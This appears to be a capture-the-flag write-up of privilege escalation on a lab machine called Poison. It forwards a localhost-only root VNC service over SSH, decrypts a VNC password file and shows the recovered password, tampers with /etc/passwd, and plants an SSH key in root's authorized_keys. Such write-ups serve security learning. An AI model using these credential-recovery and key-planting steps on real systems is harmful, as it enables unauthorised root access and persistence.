4 privesc vncviewer > root
charix@Poison:~ % netstat -anp tcp
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address Foreign Address (state)
tcp4 0 44 10.10.10.84.22 10.10.16.5.34152 ESTABLISHED
tcp4 0 0 127.0.0.1.25 *.* LISTEN
tcp4 0 0 *.80 *.* LISTEN
tcp6 0 0 *.80 *.* LISTEN
tcp4 0 0 *.22 *.* LISTEN
tcp6 0 0 *.22 *.* LISTEN
tcp4 0 0 127.0.0.1.5801 *.* LISTEN
tcp4 0 0 127.0.0.1.5901 *.* LISTEN
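# ps auxww shows Xvnc running as root on display :1, bound to localhost only (-localhost, -rfbport 5901); this matches the 127.0.0.1.5901 listener above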
root 529 0.0 0.9 23608 9020 v0- I 22:54 0:00.04 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geometry 1280x800 -depth 24 -rfbwait 120000 -rfbauth /root/.vnc/passwd -rfbport 5901 -localhost -nolisten tcp :1
# Xvnc only accepts local connections, so forward local port 5000 to port 5901 on the box over SSH
$ ssh -L 5000:localhost:5901 charix@10.10.10.84
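# using https://github.com/trinitronx/vncpasswd.py to check whether the VNC password file `secret` can be decrypted
# (VNC password files are only DES-obfuscated with a fixed, publicly known key, so read access to the file is equivalent to knowing the password)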
$ /opt/vncpasswd.py/vncpasswd.py -d -f secret
Decrypted Bin Pass= 'VNCP@$$!'
Decrypted Hex Pass= '564e435040242421'
# connect through the forwarded port with remmina, or with vncviewer (-passwd takes the password file directly):
# vncviewer localhost:5000 -passwd secret
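# tried sticky bandit, but had issues running /bin/csh
# made /etc/passwd writable and added a new line, but su then errored, and sudo is not installed
# (presumably FreeBSD: accounts are read from master.passwd / pwd.db, so editing /etc/passwd alone has no effect; confirm)
# put id_rsa.pub in /root/.ssh/authorized_keys instead
# this finally worked
# for cleanup/reporting: /etc/passwd (mode and content) and root's authorized_keys were modified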
$ ssh -i id_rsa root@10.10.10.84
root@Poison:~ # whoami;id
root
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)